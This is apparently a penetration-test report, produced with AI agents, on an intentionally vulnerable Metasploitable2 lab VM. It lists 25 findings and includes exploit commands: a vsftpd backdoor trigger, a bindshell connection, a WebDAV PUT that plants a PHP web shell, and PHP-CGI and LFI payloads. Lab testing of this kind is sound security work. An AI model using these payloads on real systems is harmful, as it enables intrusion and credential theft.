Engagement: my-metasploit-2026 Target: 192.168.122.225 (metasploitable.localdomain — Metasploitable2) OS: Linux 2.6.x Date: 2026-06-21 Phases Completed: Phase 1 Recon · Phase 2 Web · Phase 3 Binary · Phase 4 Network
Target is Metasploitable2 — intentionally vulnerable Linux VM. Every phase yielded critical findings. Multiple independent root paths confirmed. Full system compromise achieved via 3 separate vectors without chaining. 25 vulnerabilities found: 11 critical, 6 high, 4 medium, 4 low/info.
| # | Finding | Severity | Phase | Port | Tool | PoC / Module |
|---|---|---|---|---|---|---|
| 1 | Bindshell root backdoor | CRITICAL | 1 | 1524 | nmap | nc 192.168.122.225 1524 |
| 2 | vsftpd 2.3.4 CVE-2011-2523 backdoor | CRITICAL | 3 | 21/6200 | nc | USER test:) → nc :6200 = root |
| 3 | WebDAV unauth PUT + SUID Lua privesc → root | CRITICAL | 2/3 | 80 | curl/nmap | PUT /dav/cmd.php → nmap SUID euid=0 |
| 4 | Samba 3.0.20 CVE-2007-2447 usermap_script RCE | CRITICAL | 4 | 445 | enum4linux | exploit/multi/samba/usermap_script |
| 5 | distccd CVE-2004-2687 RCE | CRITICAL | 4 | 3632 | nmap | exploit/unix/misc/distcc_exec |
| 6 | UnrealIRCd 3.2.8.1 CVE-2010-2075 backdoor | CRITICAL | 1/3 | 6667 | nc | exploit/unix/irc/unreal_ircd_3281_backdoor |
| 7 | Tomcat 5.5 default creds + WAR deploy | CRITICAL | 2/3 | 8180 | curl | tomcat:tomcat → /manager/html → WAR shell |
| 8 | AJP Ghostcat CVE-2020-1938 | CRITICAL | 2 | 8009 | nuclei | Reads WEB-INF/web.xml |
| 9 | NFS / exported to * — full filesystem | CRITICAL | 4 | 2049 | nmap | mount -t nfs 192.168.122.225:/ /mnt |
| 10 | Java RMI default classloader RCE | CRITICAL | 4 | 1099 | nmap | exploit/multi/misc/java_rmi_server |
| 11 | LFI null-byte CVE-2020-29227 (mutillidae) | CRITICAL | 2 | 80 | nuclei | ?page=/etc/passwd%00 |
| 12 | PHP-CGI arg injection CVE-2012-1823 | HIGH | 2 | 80 | nuclei | ?-d+allow_url_include=on+-d+auto_prepend_file=php://input |
| 13 | VNC default password (password) | HIGH | 1 | 5900 | nuclei | vncviewer 192.168.122.225 pw=password |
| 14 | PostgreSQL default creds postgres:postgres | HIGH | 1 | 5432 | nuclei | psql -h 192.168.122.225 -U postgres |
| 15 | FTP anonymous login + weak creds | HIGH | 1 | 21 | nuclei | ftp 192.168.122.225 user=anonymous |
| 16 | rsh/rlogin/rexec no-auth trust | HIGH | 4 | 512-514 | nmap | rsh 192.168.122.225 -l root id |
| 17 | Ruby DRb RMI remote object exec | HIGH | 1 | 8787 | nmap | exploit/linux/misc/drb_remote_codeexec |
| 18 | SMB null session — 35 users dumped | MEDIUM | 4 | 445 | enum4linux | enum4linux -a 192.168.122.225 |
| 19 | SMB signing disabled | MEDIUM | 4 | 445 | nmap | NTLM relay candidate |
| 20 | phpMyAdmin exposed (likely root no-pass) | MEDIUM | 2 | 80 | curl | /phpMyAdmin/ |
| 21 | MySQL 5.0.51a exposed, no-auth root | MEDIUM | 4 | 3306 | nmap | mysql -h 192.168.122.225 -u root |
| 22 | phpinfo.php exposed | LOW | 2 | 80 | nuclei | /phpinfo.php |
| 23 | Apache 2.2.8 EOL + PHP 5.2.4 EOL | LOW | 2 | 80 | nuclei | Version fingerprint |
| 24 | Telnet cleartext auth | LOW | 1 | 23 | nmap | telnet 192.168.122.225 |
| 25 | SMTP VRFY user enumeration | INFO | 4 | 25 | nmap | VRFY root → confirmed |
nc 192.168.122.225 1524
# Result: uid=0(root) — instant
echo -e "USER test:)\nPASS test" | nc 192.168.122.225 21 &
sleep 2
echo "id" | nc 192.168.122.225 6200
# Result: uid=0(root)
curl -X PUT http://192.168.122.225/dav/cmd.php \
-d '<?php system($_GET["cmd"]); ?>'
curl "http://192.168.122.225/dav/cmd.php?cmd=id"
# www-data → nmap --script=exploit os.execute → euid=0(root)
# /etc/shadow dumped
26 open ports. OS: Linux 2.6.x. Stack: Apache 2.2.8 / PHP 5.2.4 / Tomcat 5.5. No WAF. 5 critical backdoor services identified. VNC/PostgreSQL/FTP default creds confirmed by nuclei.
4 critical web vulns: WebDAV PUT, Ghostcat AJP, LFI null-byte, Tomcat manager (tomcat:tomcat). Web apps: /mutillidae/, /phpMyAdmin/, /twiki/. Feroxbuster + nikto + nuclei ran full audit.
3 confirmed root shells: bindshell :1524, vsftpd :6200, WebDAV+SUID. Tomcat WAR deployed (tomcat55 user). distccd confirmed daemon-level RCE. UnrealIRCd version-matched.
distccd CVE-2004-2687 RCE confirmed (uid=1(daemon)). NFS / exported to * — full filesystem mountable unauthenticated. Java RMI classloader confirmed. 35 users via SMB null session. SMB signing disabled.
| Event | Timestamp (UTC) |
|---|---|
Engagement init (manage.sh engage) | 2026-06-21 12:46 |
| Phase 1 nmap start | 2026-06-21 12:47 |
| Phase 1 nmap complete | 2026-06-21 12:50:40 |
| Phase 1 nuclei complete | 2026-06-21 12:55:56 |
| Phase 1 artifacts saved | 2026-06-21 13:12:13 |
| Phase 2 + Phase 4 dispatched (parallel forks) | 2026-06-21 13:12 |
| Phase 4 agent complete | 2026-06-21 13:43 |
| Phase 2 agent complete | 2026-06-21 13:46 |
| Phase 3 agent dispatched | 2026-06-21 13:46 |
| Phase 3 agent complete | 2026-06-21 13:52 |
| final-report.md generated | 2026-06-21 13:55 |
| final-report.pdf generated | 2026-06-21 13:58:14 |
| Engagement closed | 2026-06-21 14:00 |
Total wall-clock: 1 hour 14 minutes. Parallel Phase 2+4 fork agents saved ~40 min vs sequential.
| Agent | Phase | Tokens (exact) | Tool Calls | Duration |
|---|---|---|---|---|
| Orchestrator (main session) | All | ~50,000 est. | ~15 | 1h 14m |
| phase4-network fork | Phase 4 | 69,475 | 17 | 30m 52s |
| phase2-web fork | Phase 2 | 74,091 | 17 | 33m 45s |
| phase3-binary fork | Phase 3 | 80,096 | 24 | 6m 35s |
| TOTAL | ~273,662 | ~73 |
Model: claude-sonnet-4-6 (orchestrator + all forks).
MCP bridge: docker exec -i hexstrike-ai python3 /app/hexstrike_mcp.py --server http://localhost:8888
Used: 10 (7%) | Standby: 64 (43%) | Idle: 50 (33%) | Bloated: 25 (17%)
| Tool | Invocations | Result | Notes |
|---|---|---|---|
nmap_scan | Phase 1 | SUCCESS | Full -p- -sV -sC -O scan; 26 ports found |
nuclei_scan | Phase 1 + Phase 2 | SUCCESS | 20 hits Phase 1; web vulns Phase 2 |
wafw00f_scan | Phase 1 | SUCCESS | No WAF detected |
httpx_probe | Phase 1 | FAILED | -l and -t flags invalid in container httpx; replaced by execute_command |
execute_command | All phases | SUCCESS | Primary shell fallback — ~35 invocations total |
create_file | All phases | SUCCESS | Artifact writes to /workspace |
feroxbuster_scan | Phase 2 | SUCCESS | Dir brute :80 + :8180 |
nikto_scan | Phase 2 | SUCCESS | Full HTTP audit :80 + :8180 |
smbmap_scan | Phase 4 | SUCCESS | SMB share enum; anon tmp READ/WRITE confirmed |
enum4linux_scan | Phase 4 | SUCCESS | 35 users dumped via null session |
Pentest-relevant; not invoked because existing tools covered scope or phase depth didn't require them.
| Tool | Applicable Use Case |
|---|---|
amass_scan | Subdomain/DNS recon (no external domain scope) |
anew_data_processing | Output deduplication pipeline |
api_fuzzer | API endpoint fuzzing |
api_schema_analyzer | OpenAPI/Swagger schema analysis |
arjun_parameter_discovery | HTTP hidden parameter discovery |
arjun_scan | HTTP parameter brute |
arp_scan_discovery | LAN host discovery |
autorecon_comprehensive | Full automated recon suite |
autorecon_scan | Automated recon |
bugbounty_authentication_bypass_testing | Auth bypass test suite |
bugbounty_business_logic_testing | Business logic abuse |
bugbounty_comprehensive_assessment | Full bug bounty workflow |
bugbounty_file_upload_testing | File upload vuln testing |
bugbounty_osint_gathering | OSINT collection |
bugbounty_reconnaissance_workflow | Recon workflow chain |
bugbounty_vulnerability_hunting | Vuln hunting suite |
burpsuite_alternative_scan | Web proxy active scan |
burpsuite_scan | Burp Suite scan |
comprehensive_api_audit | Deep API security audit |
dalfox_xss_scan | XSS parameter scanner |
dirb_scan | Directory brute (alt to feroxbuster) |
dirsearch_scan | Directory brute |
dnsenum_scan | DNS zone transfer + enum |
dotdotpwn_scan | Path traversal fuzzer |
enum4linux_ng_advanced | Advanced SMB/RPC enum |
ffuf_scan | Fast web fuzzer |
fierce_scan | DNS recon |
gau_discovery | GetAllURLs passive harvest |
gobuster_scan | Dir/DNS/vhost brute |
graphql_scanner | GraphQL introspection + vuln scan |
hakrawler_crawl | Fast web crawler |
hashcat_crack | GPU password cracking |
http_intruder | HTTP payload intruder |
http_repeater | HTTP manual replay |
http_set_rules | Proxy intercept rules |
http_set_scope | Proxy scope config |
hydra_attack | Network service brute force |
intelligent_smart_scan | AI-guided tool selection |
jaeles_vulnerability_scan | Signature-based web scanner |
john_crack | Password cracker |
jwt_analyzer | JWT token analysis + attacks |
katana_crawl | Web crawler (projectdiscovery) |
masscan_high_speed | High-speed port scanner |
metasploit_run | Metasploit module executor |
msfvenom_generate | Metasploit payload generator |
nbtscan_netbios | NetBIOS scanner |
netexec_scan | SMB/WinRM/LDAP enum + exec |
nmap_advanced_scan | Advanced nmap scripting |
paramspider_discovery | Parameter spider from wayback |
paramspider_mining | Parameter mining |
qsreplace_parameter_replacement | Query string replacement |
responder_credential_harvest | LLMNR/NBT-NS poisoning |
rpcclient_enumeration | RPC client enumeration |
rustscan_fast_scan | Rust-based fast port scan |
sqlmap_scan | SQL injection scanner |
subfinder_scan | Passive subdomain discovery |
uro_url_filtering | URL list deduplication |
waybackurls_discovery | Wayback URL harvest |
wfuzz_scan | Web application fuzzer |
x8_parameter_discovery | Hidden parameter discovery |
xsser_scan | XSS scanner |
zap_scan | OWASP ZAP active scan |
Not applicable to this network/web pentest profile. Binary RE, exploit dev, forensics, memory analysis, AI orchestration, process management.
| Tool | Reason Idle |
|---|---|
advanced_payload_generation | Shellcode gen — native backdoors used instead |
ai_generate_attack_suite | AI chain builder — manual phase workflow sufficient |
ai_generate_payload | AI payload gen — not triggered |
ai_reconnaissance_workflow | AI recon chain — manual workflow used |
ai_test_payload | AI payload testing — not triggered |
ai_vulnerability_assessment | AI vuln scoring — not triggered |
analyze_target_intelligence | OSINT aggregation — out of scope |
angr_symbolic_execution | Binary symbolic execution — no binary target |
binwalk_analyze | Firmware/binary analysis — not applicable |
browser_agent_inspect | Headless browser inspection — not triggered |
checksec_analyze | Binary protection check — no binary target |
correlate_threat_intelligence | TI correlation — out of scope |
create_attack_chain_ai | AI attack chain builder — manual phases used |
create_scan_summary | Alt summary gen — manual summaries written |
create_vulnerability_report | Alt report gen — manual reports written |
detect_technologies_ai | AI tech detection — nuclei/nmap covered this |
discover_attack_chains | AI chain discovery — not triggered |
exiftool_extract | Metadata extraction — no file/image target |
foremost_carving | File carving / forensics — not applicable |
gdb_analyze | GDB debugger — no binary target |
gdb_peda_debug | GDB PEDA exploit dev — no binary target |
generate_exploit_from_cve | CVE→exploit gen — existing CVEs used directly |
generate_payload | Generic payload gen — not needed |
ghidra_analysis | Reverse engineering — no binary target |
hashpump_attack | Hash length extension — no crypto target |
install_python_package | Pip utility — not needed |
libc_database_lookup | libc offset lookup — no ROP target |
list_active_processes | Process listing — execute_command used instead |
list_files | File listing — execute_command used instead |
modify_file | File modification — execute_command used instead |
monitor_cve_feeds | Live CVE feed monitoring — not triggered |
objdump_analyze | Binary disassembly — no binary target |
one_gadget_search | one_gadget ROP finder — no binary exploit path |
optimize_tool_parameters_ai | AI param optimizer — not triggered |
pause_process | Process pause control — not triggered |
pwninit_setup | PWN challenge setup — no CTF binary |
pwntools_exploit | pwntools scripting — no binary exploit written |
radare2_analyze | Reverse engineering — no binary target |
research_zero_day_opportunities | AI 0-day research — out of scope |
resume_process | Process resume control — not triggered |
ropgadget_search | ROP gadget search — no binary target |
ropper_gadget_search | ROP gadget search — no binary target |
select_optimal_tools_ai | AI tool selector — manual selection used |
steghide_analysis | Steganography analysis — not applicable |
strings_extract | Binary string extraction — no binary target |
terminate_process | Process kill control — not triggered |
threat_hunting_assistant | TI/threat hunt — out of scope |
volatility3_analyze | Memory forensics — no memory image |
volatility_analyze | Memory forensics — no memory image |
vulnerability_intelligence_dashboard | VI dashboard — not triggered |
xxd_hexdump | Hex dump — no binary target |
Out of scope for any external network/web pentest. Cloud compliance, IaC scanning, Kubernetes, container security, runtime monitoring. Recommend removing from pentest manifest.
| Tool | Category | Why Bloated |
|---|---|---|
checkov_iac_scan | IaC security | No Terraform/CloudFormation target |
clair_vulnerability_scan | Container image CVE | No container image to scan |
cloudmapper_analysis | AWS topology | No cloud target |
docker_bench_security_scan | Docker CIS | No Docker daemon target |
falco_runtime_monitoring | Runtime security | Not a monitoring engagement |
kube_bench_cis | Kubernetes CIS | No K8s cluster target |
kube_hunter_scan | Kubernetes pentest | No K8s target |
pacu_exploitation | AWS exploitation | No AWS target |
prowler_scan | Cloud compliance | No cloud target |
scout_suite_assessment | Multi-cloud audit | No cloud target |
terrascan_iac_scan | Terraform scan | No IaC target |
trivy_scan | Container/IaC vuln | No container image |
clear_cache | Internal utility | Server-internal only |
display_system_metrics | Internal metrics | Server-internal only |
error_handling_statistics | Internal diagnostics | Server-internal only |
format_tool_output_visual | Internal formatter | Server-internal only |
get_cache_stats | Internal cache | Server-internal only |
get_live_dashboard | Internal dashboard | Server-internal only |
get_process_dashboard | Internal process view | Server-internal only |
get_process_status | Internal process status | Server-internal only |
get_telemetry | Internal telemetry | Server-internal only |
server_health | Internal health check | Server-internal only |
test_error_recovery | Internal error testing | Server-internal only |
wpscan (disabled) | WordPress scanner | API key not configured |
shodan (disabled) | Internet search | API key not configured |
| Status | Count | % | Action |
|---|---|---|---|
| USED | 10 | 7% | Core tools — keep |
| STANDBY | 64 | 43% | Available for deeper phases — keep |
| IDLE | 50 | 33% | Binary/forensics/RE profile — keep for binary engagements |
| BLOATED | 25 | 17% | Remove from pentest manifest — wrong profile |
| Total | 149 | 100% |
workspace/reports/my-metasploit-2026/
├── engagement.md
├── final-report-v2.md + .pdf ← this file
├── phase1-recon/
│ ├── nmap-full.txt
│ ├── nuclei-results.txt
│ └── phase1-summary.md
├── phase2-web/
│ ├── feroxbuster-80.txt
│ ├── feroxbuster-8180.txt
│ ├── nikto-80.txt
│ ├── nikto-8180.txt
│ ├── nuclei-web-vulns.txt
│ ├── nuclei-mutillidae.txt
│ ├── tomcat-manager.txt
│ ├── ajp-ghostcat.txt
│ ├── phpmyadmin.txt
│ └── phase2-summary.md
├── phase3-binary/
│ ├── bindshell-1524.txt
│ ├── webdav-webshell.txt
│ ├── distccd-rce.txt
│ ├── vsftpd-backdoor.txt
│ ├── tomcat-war-shell.txt
│ ├── unrealircd-backdoor.txt
│ ├── privesc-enum.txt
│ └── phase3-summary.md
└── phase4-network/
├── smbmap.txt
├── enum4linux.txt
├── nfs-enum.txt
├── distccd-vuln.txt
├── rmi-probe.txt
├── smtp-enum.txt
├── mysql-access.txt
├── rsh-test.txt
└── phase4-summary.md